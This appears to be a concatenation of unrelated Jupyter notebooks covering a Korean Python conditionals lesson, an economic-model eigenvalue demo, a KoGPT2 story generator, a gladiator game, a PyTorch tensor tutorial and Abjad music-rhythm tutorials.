__나. and, or, not__* 조건을 판단하기 위해 사용하는 다른 연산자로는 and, or, not이 있다. | 연산자 | 설명 || :-: | :-: || __x or y__ | x와 y 둘 중에 하나만 참이면 참이다 || __x and y__ | x와 y 모두 참이어야 참이다 || __not x__ | x가 거짓이면 참이다 |
###Code
'''돈이 3000원 이상 있거나 카드가 있다면 택시를 타고 그렇지 않으면 걸어가라'''
money = 2000
card = 1
if money >= 3000 or card :
print('택시를 타라')
else :
print('걸어가라')
# money는 2000이지만 card가 1이기 때문에 money >= 3000 or card라는 조건문이 참이 된다
# 따라서 if문 다음의 '택시를 타라'라는 문장이 수행된다
###Output
택시를 타라
###Markdown
__다. 다른 언어에서 볼수 없는 조건문__* 더 나아가 파이썬은 다른 프로그래밍 언어에서 쉽게 볼 수 없는 재미있는 조건문들을 제공한다
###Code
print(1 in [1, 2, 3])
print(1 not in [1, 2, 3])
###Output
True
False
###Markdown
* 첫번째 예는 '[1, 2, 3]이라는 리스트 안에 1이 있는가?'라는 조건문이다1은 [1, 2, 3] 안에 있으므로 참이 되어 True를 리턴한다* 두번째 예는 '[1, 2, 3]이라는 리스트 안에 1이 없는가'라는 조건문이다1은 [1, 2, 3] 안에 있으므로 거짓이 되어 False를 리턴한다
###Code
'''만약 주머니에 돈이 있으면 택시를 타고, 없으면 걸어 가라'''
pocket = ['paper', 'cellphone', 'money']
if 'money' in pocket :
print('택시를 타라')
else :
print('걸어가라')
'''조건문에서 아무 일도 하지 않게 설정하고 싶다면?'''
'''주머니에 돈이 있으면 가만히 있고 주머니에 돈이 없으면 카드를 꺼내라'''
pocket = ['paper', 'cellphone', 'money']
if 'money' in pocket :
pass
else :
print('카드를 꺼내라')
# pocket이라는 리스트 안에 money라는 문자열이 있기 때문에
# if문 다음 문장인 pass가 수행되고 아무런 결과값도 보여 주지 않는다
if 'money' in pocket : pass
else : print('카드를 꺼내라')
###Output
_____no_output_____
###Markdown
만약 조건문에서 아무런 일도하지 않도록 설정하고 싶다면 수행할 문장을 쓰는 곳에 pass 를 써주면 된다!if문이나 else문 뒤에 즉 조건문 뒤에 수행할 문장이 한 줄밖에 되지 않는다면 줄바꿈을 하지 않고 바로 옆에 적어도 된다. __라. 다양한 조건을 판단하는 elif__* if와 else 만으로는 다양한 조건을 판단하기 어렵다
###Code
'''주머니에 돈이 있으면 택시를 타고, 주머니에 돈은 없지만 카드가 있으면 택시를 타고, 돈도없고 카드도 없으면 걸어가라'''
pocket = ['paper', 'cellphone']
card = 1
if 'money' in pocket :
print('택시를 타라')
else :
if card :
print('택시를 타고')
else :
print('걸어가라')
'''elif 사용'''
pocket = ['paper', 'cellphone']
card = 1
if 'money' in pocket : # 주머니에 돈이 있으면
print('택시를 타라')
elif card : # 주머니에 돈이 없고 카드가 있으면
print('택시를 타고')
else : # 주머니에 돈도 없고 카드도 없으면
print('걸어가라')
###Output
택시를 타고
|
Examples/ModelFlow features/modefflow diff.ipynb | ###Markdown
Stability
###Code
geteigen(mul=0.5,acc=0,years=30,show=1)
###Output
_____no_output_____
###Markdown
Explosion
###Code
geteigen(mul=0.9,acc=2,years=30,show=1)
###Output
_____no_output_____
###Markdown
Exploding oscillations
###Code
geteigen(mul=0.6,acc=2,years=30,show=1)
###Output
_____no_output_____
###Markdown
Perpetual oscillations
###Code
geteigen(mul=0.5,acc=2,years=30,show=1)
###Output
_____no_output_____
###Markdown
Dampened oscillations
###Code
geteigen(mul=0.7,acc=1,years=30,show=1)
###Output
_____no_output_____
###Markdown
Stability
###Code
geteigen(mul=0.5,acc=0,years=30,show=1)
###Output
_____no_output_____
###Markdown
Explosion
###Code
geteigen(mul=0.9,acc=2,years=30,show=1)
###Output
_____no_output_____
###Markdown
Exploding oscillations
###Code
geteigen(mul=0.6,acc=2,years=30,show=1)
###Output
_____no_output_____
###Markdown
Perpetual oscillations
###Code
geteigen(mul=0.5,acc=2,years=30,show=1)
###Output
_____no_output_____
###Markdown
Dampened oscillations
###Code
geteigen(mul=0.7,acc=1,years=30,show=1)
###Output
_____no_output_____ |
3_story_generator.ipynb | ###Markdown
Story Generator 1. Ready 1.1 기본 패키지 임포트
###Code
import torch
from transformers import PreTrainedTokenizerFast
from transformers import GPT2LMHeadModel
###Output
_____no_output_____
###Markdown
1.2 학습 모델 다운로드
###Code
MODEL_NAME = "skt/kogpt2-base-v2"
###Output
_____no_output_____
###Markdown
1.3 토크나이저 load
###Code
tokenizer = PreTrainedTokenizerFast.from_pretrained(MODEL_NAME)
TOKENS_DICT = {
'bos_token':'<s>',
'eos_token':'</s>',
'unk_token':'<unk>',
'pad_token':'<pad>',
'mask_token':'<mask>'
}
# 특수 토큰이 토크나이저에 추가되고 모델은 수정된 토크나이저에 맞게 임베딩의 크기를 조정
tokenizer.add_special_tokens(TOKENS_DICT)
print(tokenizer.special_tokens_map)
###Output
The tokenizer class you load from this checkpoint is not the same type as the class this function is called from. It may result in unexpected tokenization.
The tokenizer class you load from this checkpoint is 'GPT2Tokenizer'.
The class this function is called from is 'PreTrainedTokenizerFast'.
###Markdown
1.4 미세조정학습 모델 load
###Code
from util.generator import sample_sequence as gen
from util.model import model_loading as load
checkpointPath = "./model/tale_model.tar"
loading = True
model,ckp = load(checkpointPath, PU = 'cpu', status = loading)
print(ckp['epoch'], ckp['loss'])
vocab_path = "./data/정제/index_tale_plus_novel.txt"
context = \
"""
이른 아침
"""
generated = gen(
vocab=vocab_path,
model=model,
length=500,
context=context,
num_samples=1,
repetition_penalty=2.0,
top_p=0.9,
tokenizer = tokenizer)
print(tokenizer.decode(generated[0]))
###Output
9%|▉ | 18/200 [00:00<00:09, 18.76it/s] |
_notebooks/2021-07-08-Spartacus.ipynb | ###Markdown
**Jogos de Guerra**: Os GladiadoresNa Roma Antiga, os Gladiadores lutavam entre si na arena, para entretimento do Imperador e do público. O espetáculo, violento e sangrento, era até à morte. Hoje, vamos escrever um pequeno jogo em Python, que nos permita simular um jogo de gladiadores com o computador!Um gladiador (computador) está escondido numa arena de 5 por 5 metros. A cada jogada, é colocado numa posição aleatória (x,y) na arena.O utilizador deve então também colocar o seu jogador (adversário) na arena. O gladiador tem uma zona de ataque de raio *r*, como mostra a figura, e o jogo respeita as seguintes regras:[Exemplo: Arena de Gladiadores](https://drive.google.com/file/d/1tpsjlYXm5R6ajf0-JL1luAXFz79xEPWY/view?usp=sharing)* Se o adversário estiver longe do gladiador, escapa com vida!* Se o adversário estiver na zona de ataque do gladiador **e se o gladiador estiver em modo de ataque**, então o gladiador decapitará o seu adversário instantaneamente. Estar “em modo de ataque” deverá ser um comportamento aleatório;* Se o adversário estiver na zona de ataque do gladiador **e o gladiador não estiver em modo de ataque**, então o gladiador é morto.Podemos assumir o seguinte:* São permitidas no máximo 10 jogadas;* O raio de ataque do gladiador é de 2 metros;* A cada jogada, o programa deverá indicar se o adversário escapou ou não com vida;* No final de todas as jogadas, deve ser impresso o número total de vítimas e sobreviventes. No entanto, se o gladiador for morto numa jogada, o programa deverá parar e indicar o número de vítimas e sobreviventes até ao momento e o número de jogadas que foram necessárias para o aniquilar!**Nota:**A distância entre dois pontos A e B é medida da seguinte forma: $d(A,B) = \sqrt{(xA - xB)^2 + (yA - yB)^2}$
###Code
# ARdC exercise: Challenge the Gladiator
import random
# Constants
ATTACK_RANGE = 2
X_ARENA = 5
Y_ARENA = 5
# 1. PLACE THE GLADIATOR IN THE ARENA
def place_gladiator():
x_glad = random.random() * X_ARENA
y_glad = random.random() * Y_ARENA
attack = random.choice([True, False]) # Single random element from a sequence
return {
"X": x_glad,
"Y": y_glad,
"Attack": attack
}
# 2. PLACE THE PLAYER IN THE ARENA
def call_input(dimension):
return float(input("Indicate your %s positioning in the arena: " % dimension))
def place_player():
print("The arena has a 5 x 5 meters area. You have to chose your position within these dimensions.")
x_player = call_input("horizontal")
while x_player < 0 or x_player > X_ARENA:
x_player = call_input("horizontal")
y_player = call_input("vertical")
while y_player < 0 or y_player > Y_ARENA:
y_player = call_input("vertical")
return {
"X": x_player,
"Y": y_player
}
# 3. CALCULATE THE DISTANCE BETWEEN THE GLADIATOR AND THE PLAYER
def dist_glad_to_player(x_glad, x_play, y_glad, y_play):
return ((x_glad - x_play) ** 2 + (y_glad - y_play) ** 2) ** 0.5
# DRIVER CODE
# Statistics
plays_max = 10
plays_count = 0
players_dead = 0
players_survived = 0
while plays_count < plays_max:
gladiator = place_gladiator()
# print(gladiator)
print("The Gladiator is ready!")
player = place_player()
# print(player)
print("The player is ready at position %s x %s!" % (player["X"], player["Y"]))
distance_to_glad = dist_glad_to_player(gladiator["X"], player["X"], gladiator["Y"], player["Y"])
input("Fight!")
if distance_to_glad > ATTACK_RANGE:
print("The player has survived!")
players_survived += 1
elif distance_to_glad <= ATTACK_RANGE and gladiator["Attack"] == True:
print("The Gladiator has eliminated the opponent!")
players_dead += 1
elif distance_to_glad <= ATTACK_RANGE and gladiator["Attack"] == False:
print("The Gladiator was killed!")
gladiator_dead = 1
players_survived += 1
plays_count += 1
break
plays_count += 1
input("")
print("The battle in the Coliseum has ended!")
print("Victims: %s" % players_dead)
print("Survivors: %s" % players_survived)
print("Attempts to kill the Gladiator: %s" % plays_count)
###Output
_____no_output_____ |
PyTorch Tensor Notebook.ipynb | ###Markdown
PyTorch Tensor Notebook The Data Spartan Helpful Resourses: 1. https://pytorch.org/tutorials/beginner/blitz/tensor_tutorial.htmlsphx-glr-beginner-blitz-tensor-tutorial-py2. https://pytorch.org/docs/stable/tensors.htmlTensors are similar to NumPy’s ndarrays, with the addition being that Tensors can also be used on a GPU to accelerate computing.
###Code
from __future__ import print_function
import torch
###Output
_____no_output_____
###Markdown
Tensor Initialization An Uninitialized 5 X 4 Tensor
###Code
x = torch.empty(5, 4)
print(x)
###Output
tensor([[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.]])
###Markdown
A Randomly Initialized 5 x 4 Tensor
###Code
x = torch.rand(5, 4)
print(x)
###Output
tensor([[0.3535, 0.4391, 0.5321, 0.1974],
[0.8540, 0.1070, 0.4687, 0.5473],
[0.4851, 0.2560, 0.0404, 0.9112],
[0.1850, 0.6871, 0.4745, 0.4137],
[0.4271, 0.6072, 0.7693, 0.6042]])
###Markdown
A 5 x 4 Tensor filled zeros and of dtype long
###Code
x = torch.zeros(5, 4, dtype=torch.long)
print(x)
###Output
tensor([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]])
###Markdown
A 1 x 3 Tensor with Data Fed directly into it
###Code
x = torch.tensor([5, 3, 4])
print(x)
###Output
tensor([5, 3, 4])
###Markdown
A 2 x 3 Tensor with Data Directly Fed into it
###Code
x = torch.tensor([[6, 5, 4], [3, 2, 1]])
print(x)
###Output
tensor([[6, 5, 4],
[3, 2, 1]])
###Markdown
A 5 x 4 Tensor with ones using new_one methods and passing the dimension and type as parameters
###Code
x = x.new_ones(5, 4, dtype=torch.double)
print(x)
###Output
tensor([[1., 1., 1., 1.],
[1., 1., 1., 1.],
[1., 1., 1., 1.],
[1., 1., 1., 1.],
[1., 1., 1., 1.]], dtype=torch.float64)
###Markdown
A 1 x 4 Tensor with ones using new_one methods and passing the dimension and type as parameters
###Code
x = x.new_ones(1, 4, dtype=torch.double)
print(x)
###Output
tensor([[1., 1., 1., 1.]], dtype=torch.float64)
###Markdown
A 5 x 4 Tensor with zeros using new_zero methods and passing the dimension and type as parameters
###Code
x = x.new_zeros(5, 4, dtype=torch.double)
print(x)
###Output
tensor([[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.]], dtype=torch.float64)
###Markdown
A 1 x 4 Tensor with zeros using new_zero methods and passing the dimension and type as parameters
###Code
x = x.new_zeros(1, 4, dtype=torch.double)
print(x)
###Output
tensor([[0., 0., 0., 0.]], dtype=torch.float64)
###Markdown
Setting Dtype to Float
###Code
x = torch.randn_like(x, dtype=torch.float)
print(x)
###Output
tensor([[ 0.4822, 0.9900, -1.4706, 0.1237]])
###Markdown
Printing the Size of a Tensor
###Code
print(x.size())
###Output
torch.Size([1, 4])
###Markdown
Operations with Tensors Transpose
###Code
x.t()
# Transpose (via permute)
x.permute(-1,0)
###Output
_____no_output_____
###Markdown
Slicing
###Code
x = torch.Tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
print(x)
# Print the last column
print(x[:, -1])
# First 2 rows
print(x[:2, :])
# Lower right corner
print(x[-1:, -1:])
###Output
tensor([[9.]])
###Markdown
Addition
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
y = torch.tensor([[2, 2, 2], [3, 3, 3], [4, 4, 4]])
z = x + y
print(z)
###Output
tensor([[ 3, 4, 5],
[ 7, 8, 9],
[11, 12, 13]])
###Markdown
Subtraction
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
y = torch.tensor([[2, 2, 2], [3, 3, 3], [4, 4, 4]])
z = x - y
print(z)
###Output
tensor([[-1, 0, 1],
[ 1, 2, 3],
[ 3, 4, 5]])
###Markdown
Multiplication
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
y = torch.tensor([[2, 2, 2], [3, 3, 3], [4, 4, 4]])
z = x * y
print(x)
###Output
tensor([[1, 2, 3],
[4, 5, 6],
[7, 8, 9]])
###Markdown
Scalar Addition
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
z = x + 1
print(z)
###Output
tensor([[ 2, 3, 4],
[ 5, 6, 7],
[ 8, 9, 10]])
###Markdown
Scalar Subtraction
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
z = x - 1
print(z)
###Output
tensor([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
###Markdown
Scalar Multiplication
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
z = x * 2
print(x)
###Output
tensor([[1, 2, 3],
[4, 5, 6],
[7, 8, 9]])
###Markdown
Scalar Divion
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
z = x / 2
print(z)
###Output
tensor([[0, 1, 1],
[2, 2, 3],
[3, 4, 4]])
###Markdown
Alternate Method for Addition
###Code
print(torch.add(x, y))
###Output
tensor([[ 3, 4, 5],
[ 7, 8, 9],
[11, 12, 13]])
###Markdown
Adding In place i.e the tensor itself is modified Adding x to yNote : Any operation that mutates a tensor in-place is post-fixed with an _. For example: x.copy_(y), x.t_(), will change x.
###Code
y.add_(x)
print(y)
###Output
tensor([[ 3, 4, 5],
[ 7, 8, 9],
[11, 12, 13]])
###Markdown
NumPy Array-like indexing
###Code
print(x[:, 1])
###Output
tensor([2, 5, 8])
###Markdown
Resizing If you want to resize/reshape tensor, you can use torch.view:
###Code
x = torch.randn(4, 4)
y = x.view(16)
z = x.view(-1, 8) # the size -1 is inferred from other dimensions
print(x.size(), y.size(), z.size())
###Output
torch.Size([4, 4]) torch.Size([16]) torch.Size([2, 8])
###Markdown
Accessing the Element-wise Value of a TensorIf you have one element tensor, use .item() to get the value as a Python number. For multiple elements, use a loop.
###Code
x = torch.randn(1)
print(x)
print(x.item())
x = torch.rand(5)
print(x)
for item in x:
print(item.item())
###Output
tensor([0.5220, 0.7616, 0.5711, 0.9260, 0.4563])
0.5220347046852112
0.7616415023803711
0.5711096525192261
0.9259992837905884
0.4563405513763428
###Markdown
Converting a Torch Tensor to a NumPy Array
###Code
a = torch.ones(5)
print(a)
b = a.numpy()
print(b)
# Notice how modifying the Tensor a will affect the Numpy Array b
a.add_(1)
print(a)
print(b)
###Output
tensor([2., 2., 2., 2., 2.])
[ 2. 2. 2. 2. 2.]
###Markdown
Converting NumPy Array to Torch Tensor
###Code
import numpy as np
a = np.ones(5)
b = torch.from_numpy(a)
print(a)
print(b)
np.add(a, 1, out=a)
print(a)
print(b)
a = np.random.rand(4,3)
a
b = torch.from_numpy(a)
b
b.numpy()
# Multiply PyTorch Tensor by 5, in place
b.mul_(5)
# Numpy array matches new values from Tensor
a
###Output
_____no_output_____ |
day-2/1-rhythms.ipynb | ###Markdown
A Bottom-up Approach to Complex Rhythms
###Code
%load_ext abjadext.ipython
import abjad
import random
durations = []
numerators = range(16)
denominators = [2**x for x in range(1, 5)]
for x in range(10):
numerator = random.choice(numerators)
denominator = random.choice(denominators)
duration_token = (numerator, denominator)
duration = abjad.Duration(duration_token)
durations.append(duration)
for d in durations:
print(d)
###Output
5/2
1/2
7/8
3/4
5/2
1/2
0
9/16
15/4
3/8
###Markdown
Assignability is a thing:
###Code
duration = abjad.Duration(5,4)
note = abjad.Note(0, (duration))
###Output
_____no_output_____
###Markdown
The `LeafMaker` class helps us around the assignability error:
###Code
maker = abjad.LeafMaker()
pitches = [None]
durations = [abjad.Duration(3, 8), abjad.Duration(5, 8)]
leaves = maker(pitches, durations)
leaves
###Output
_____no_output_____
###Markdown
Tuplets Use the `Tuplet` class to make tuplets (of any non-binary division). The Tuplet class provides an interface for working with complex rhythms in a bottom-up way:
###Code
tuplet = abjad.Tuplet(abjad.Multiplier(2, 3), "c'8 d'8 e'8")
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
You can also pack existing leaves into a Tuplet instance.
###Code
leaves = [abjad.Note("fs'8"), abjad.Note("g'8"), abjad.Rest('r8')]
tuplet = abjad.Tuplet(abjad.Multiplier(2, 3), leaves)
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Tuplet instances all have a multiplier and components.
###Code
tuplet
###Output
_____no_output_____
###Markdown
Understanding Augmentation and Diminution Remember that any tuplet can be represented as an augmentation or a diminution relative to the written notes' default values. Our example tuplet's multiplier of (2,3) for three eighth notes means that each written eighth note lasts for 2/3rds its written value. Because the original durations have been reduced, this is a diminution:
###Code
tuplet.diminution()
###Output
_____no_output_____
###Markdown
A tuplet with a multiplier greater than 1, on the other hand, would be an augmentation:
###Code
tuplet = abjad.Tuplet((4,3), "fs'16 g'16 r16")
tuplet.diminution()
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
This last tuplet is an augmentation in which each of the written sixteenth notes lasts for 4/3rds of its written duration. The sounding result would be identical, and these are just two ways of writing the same thing, the former of which happens to be conventional. Remember that object-oriented programming gives us objects with characteristics and behaviors. We can use the dot-chaining syntax to read and write the tuplet's multiplier attribute:
###Code
tuplet = abjad.Tuplet(abjad.Multiplier(2, 3), "fs'8 g' r8")
tuplet.multiplier
tuplet.multiplier = abjad.Multiplier(4, 5)
tuplet
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Adding Leaves The multiplier is a reasonable characteristic for our tuplet to have, but what about behaviors? Well, you probably want to be able to build up tuplets by adding leaves to them, one or several a time. The append method adds leaves to the end of a tuplet (and to any Python list), one leaf at a time:
###Code
tuplet.append(abjad.Note("e'4."))
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
...or using a LilyPond string:
###Code
tuplet.append("bf8")
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Likewise, the extend method adds two or more leaves at a time:
###Code
notes = [abjad.Note("fs'32"), abjad.Note("e'32"), abjad.Note("d'32"), abjad.Rest((1, 32))]
tuplet.extend(notes)
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
And you can use a LilyPond string with extend, too:
###Code
tuplet.extend("gs'8 a8")
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Removing Leaves You can remove tuplet components by reference using the remove method:
###Code
tuplet.remove(tuplet[3])
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
If you want to remove a component by index and then keep it to do something else with it, use the pop method instead of remove:
###Code
popped = tuplet.pop(2)
popped
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Indexing Leaves Tuplets support indexing, if you'd like to do something to the nth component of a tuplet:
###Code
tuplet[1]
###Output
_____no_output_____
###Markdown
If you've added an existing list to a tuplet's components, and you'd like to see where a component of that list is in the tuplet, you can use the tuplet's index method - in our case, we'll use our notes list from above:
###Code
notes
notes[1]
tuplet.index(notes[1]) # Where is the second element of notes in tuplet?
abjad.show(tuplet) # it's at index 4
###Output
_____no_output_____
###Markdown
Making Tuplets from Durations and Ratios The Tuplet class also provides a method for constructing a tuplet from a duration and a ratio, where the ratio is a list of integers, the sum of which determines the number of equally spaced pulses within the duration:
###Code
tuplet = abjad.Tuplet()
tuplet = abjad.Tuplet.from_duration_and_ratio((1,4), [1,3,1])
staff = abjad.Staff([tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
This might not seem like much, but we can write functions that use these kinds of basic functionalities to do more complicated things, like we'll do in this next example, taken from a real score: Brian Ferneyhough - Unsichtbare Farben Mikhial Malt analyzes the rhythmic materials of Ferneyhough’s solo violin composition, Unsichtbare Farben, in The OM Composer’s Book 2.Malt explains that Ferneyhough used OpenMusic to create an “exhaustive catalogue of rhythmic cells” such that:Each cell consists of the same duration divided into two pulses related by a durational proportion ranging from 1:1 to 1:11.The second pulse is then subdivided successively into 1, 2, 3, 4, 5 and 6 equal parts.Let’s recreate Malt’s results in Abjad. The Proportions We use a list comprehension to describe a list of (1,n) tuples, each of which will describe the durational proportion between a cell's first and second pulse:
###Code
proportions = [(1, n) for n in range(1, 11 + 1)]
proportions
###Output
_____no_output_____
###Markdown
The Transforms Next we’ll show how to divide a quarter note into various ratios, and then divide the final logical tie of the resulting tuplet into yet another ratio:
###Code
def make_nested_tuplet(
tuplet_duration,
outer_tuplet_proportions,
inner_tuplet_subdivision_count,
):
r'''Makes nested tuplet.
'''
outer_tuplet = abjad.Tuplet.from_duration_and_ratio(
tuplet_duration, outer_tuplet_proportions)
inner_tuplet_proportions = inner_tuplet_subdivision_count * [1]
last_leaf = next(abjad.iterate(outer_tuplet).leaves(reverse=True))
right_logical_tie = abjad.inspect(last_leaf).logical_tie()
right_logical_tie.to_tuplet(inner_tuplet_proportions)
return outer_tuplet
###Output
_____no_output_____
###Markdown
And of course it's easier to see what this function does with an example of use:
###Code
tuplet = make_nested_tuplet(abjad.Duration(1, 4), (1, 1), 5)
staff = abjad.Staff([tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
We see that a duration of a quarter note (the first argument) has been divided into two pulses with a durational proportion of 1:1 (second argument), the second pulse of which has then been divided into five equally spaced parts (the third argument). Try changing the arguments and see what happens.
###Code
tuplet = make_nested_tuplet(abjad.Duration(1, 4), (13, 28), 11)
staff = abjad.Staff([tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
tuplet = make_nested_tuplet(abjad.Duration(1, 4), (3, 1), 5)
staff = abjad.Staff([tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
Logical Ties Solve the Problem of Five A logical tie is a selection of notes or chords connected by ties. It lets us talk about a notated rhythm of 5/16, for example, which can not be expressed with only a single leaf.Note how we can divide a tuplet whose outer proportions are 3/5, where the second logical tie requires two notes to express the 5/16 duration:
###Code
outer_tuplet = abjad.Tuplet.from_duration_and_ratio(abjad.Duration(1, 4), (3, 5))
staff = abjad.Staff([outer_tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
subdivided_tuplet = make_nested_tuplet(abjad.Duration(1, 4), (3, 5), 3)
staff = abjad.Staff([subdivided_tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
Do you see which objects and methods in our make_nested_tuplet function convert a logical tie into a tuplet? The Rhythms Now that we know how to make the basic building block, let’s make a lot of tuplets all at once.We’ll set the duration of each tuplet equal to a quarter note:
###Code
duration = abjad.Fraction(1,4)
###Output
_____no_output_____
###Markdown
Reusing our make_nested_tuplet function, we make one row of rhythms, with the last logical tie increasingly subdivided:
###Code
def make_row_of_nested_tuplets(
tuplet_duration,
outer_tuplet_proportions,
column_count,
):
r'''Makes row of nested tuplets.
'''
assert 0 < column_count
row_of_nested_tuplets = []
for n in range(column_count):
inner_tuplet_subdivision_count = n + 1
nested_tuplet = make_nested_tuplet(
tuplet_duration,
outer_tuplet_proportions,
inner_tuplet_subdivision_count,
)
row_of_nested_tuplets.append(nested_tuplet)
return row_of_nested_tuplets
tuplets = make_row_of_nested_tuplets(duration, (2, 1), 6)
staff = abjad.Staff(tuplets, lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
If we can make one single row of rhythms, we can make many rows of rhythms. We reuse this last function to make another function:
###Code
def make_rows_of_nested_tuplets(tuplet_duration, row_count, column_count):
r'''Makes rows of nested tuplets.
'''
assert 0 < row_count
rows_of_nested_tuplets = []
for n in range(row_count):
outer_tuplet_proportions = (1, n + 1)
row_of_nested_tuplets = make_row_of_nested_tuplets(
tuplet_duration, outer_tuplet_proportions, column_count)
rows_of_nested_tuplets.append(row_of_nested_tuplets)
return rows_of_nested_tuplets
score = abjad.Score()
for tuplet_row in make_rows_of_nested_tuplets(duration, 10, 6):
score.append(abjad.Staff(tuplet_row, lilypond_type='RhythmicStaff'))
abjad.show(score)
###Output
_____no_output_____
###Markdown
This example illustrates how simpler bottom-up rhythmic construction might be abstracted to explore the potential of a bottom-up rhythmic idea. Meter
###Code
### Chopping Durations with Durations
###Output
_____no_output_____
###Markdown
It's easy to make durations that don't neatly fit into a particular time signature:
###Code
staff = abjad.Staff("c'4. c'4. c'4. c'4. c'4. c'4. c'4. c'4.")
abjad.f(staff)
###Output
\new Staff
{
c'4.
c'4.
c'4.
c'4.
c'4.
c'4.
c'4.
c'4.
}
###Markdown
Let's make this metrically legible by chopping the leaves every whole note using `mutate().split()`. Note that this function returns selections full of the kind of component you split: if you want to split leaves in place, pass in `staff[:]`, and if you want to return `Selection`s containing new `Staff`s, pass in `staff`.To keep splitting by the same duration until we get through all of the leaves, set the keyword argument cyclic equal to `True`.
###Code
abjad.mutate(staff[:]).split([abjad.Duration(4,4)], cyclic=True)
abjad.f(staff)
###Output
\new Staff
{
c'4.
c'4.
c'4
~
c'8
c'4.
c'4.
c'8
~
c'4
c'4.
c'4.
}
###Markdown
This is better -- the music now plays nice with LilyPond's barlines and isn't incorrectly notated -- but in Python, we still don't have any `Measure` objects, and our staff still iterates through leaves:
###Code
for leaf in staff[:5]:
print(leaf)
###Output
c'4.
c'4.
c'4
c'8
c'4.
###Markdown
What should we do if we want to iterate through our music measure by measure? Wrapping Leaves in Measures We can create `Measure` objects by wrapping each split `Selection` in a `Container`:
###Code
duration = abjad.Duration(4,4)
for shard in abjad.mutate(staff[:]).split([duration] , cyclic=True):
abjad.mutate(shard).wrap(abjad.Container())
abjad.f(staff)
abjad.show(staff)
###Output
\new Staff
{
{
c'4.
c'4.
c'4
~
}
{
c'8
c'4.
c'4.
c'8
~
}
{
c'4
c'4.
c'4.
}
}
###Markdown
Now we have measures in our score tree, and our staff will iterate through measures by default.
###Code
for measure in staff:
print(measure)
###Output
Container("c'4. c'4. c'4 ~")
Container("c'8 c'4. c'4. c'8 ~")
Container("c'4 c'4. c'4.")
###Markdown
If we want to iterate by leaves, now we need to use `abjad.iterate()`.
###Code
for leaf in abjad.iterate(staff).leaves():
print(leaf)
###Output
c'4.
c'4.
c'4
c'8
c'4.
c'4.
c'8
c'4
c'4.
c'4.
###Markdown
Rewriting Rhythms with Metric Hierarchies This is looking better, but the internal rhythms of our music still fail to comport with conventions of notation that dictate that we should always show beat three in a measure of (4,4). To do this, we need to impose a hierarchical model of meter onto our music, measure by measure.
###Code
four = abjad.Meter()
for measure in staff:
abjad.mutate(measure).rewrite_meter(four)
abjad.f(staff)
###Output
\new Staff
{
{
c'4.
c'4.
c'4
~
}
{
c'8
c'4.
c'4.
c'8
~
}
{
c'4
c'4.
c'4.
}
}
###Markdown
This didn't change anything, because Abjad's default (4,4) hierarchy is just four quarter notes:
###Code
abjad.graph(four)
###Output
_____no_output_____
###Markdown
We need to define a custom meter that includes another level of metric hierarchy and rewrite according to that. To do this, we'll use IRCAM's rhythm tree syntax:
###Code
other_four = abjad.Meter('(4/4 ((2/4 (1/4 1/4)) (2/4 (1/4 1/4)) ))')
for measure in staff:
abjad.mutate(measure).rewrite_meter(other_four)
abjad.f(staff)
###Output
\new Staff
{
{
c'4.
c'8
~
c'4
c'4
~
}
{
c'8
c'4.
c'4.
c'8
~
}
{
c'4
c'4
~
c'8
c'4.
}
}
###Markdown
This works, because our new meter contains a second level of metric hierarchy.
###Code
abjad.graph(other_four)
###Output
_____no_output_____
###Markdown
A Bottom-up Approach to Complex Rhythms
###Code
from abjad import *
###Output
_____no_output_____
###Markdown
Tuplets The Tuplet class provides an interface for working with complex rhythms in a bottom-up way.
###Code
tuplet = Tuplet(Multiplier(2, 3), "c'8 d'8 e'8")
show(tuplet)
###Output
_____no_output_____
###Markdown
You can also pack existing leaves into a Tuplet instance.
###Code
leaves = [Note("fs'8"), Note("g'8"), Rest('r8')]
tuplet = Tuplet(Multiplier(2, 3), leaves)
show(tuplet)
###Output
_____no_output_____
###Markdown
Tuplet instances all have a multiplier and components.
###Code
tuplet
###Output
_____no_output_____
###Markdown
Understanding Augmentation and Diminution Remember that any tuplet can be represented as an augmentation or a diminution relative to the written notes' default values. Our example tuplet's multiplier of (2,3) for three eighth notes means that each written eighth note lasts for 2/3rds its written value. Because the original durations have been reduced, this is a diminution:
###Code
tuplet.is_diminution
###Output
_____no_output_____
###Markdown
A tuplet with a multiplier greater than 1, on the other hand, would be an augmentation:
###Code
tuplet = Tuplet((4,3), "fs'16 g'16 r16")
show(tuplet)
###Output
_____no_output_____
###Markdown
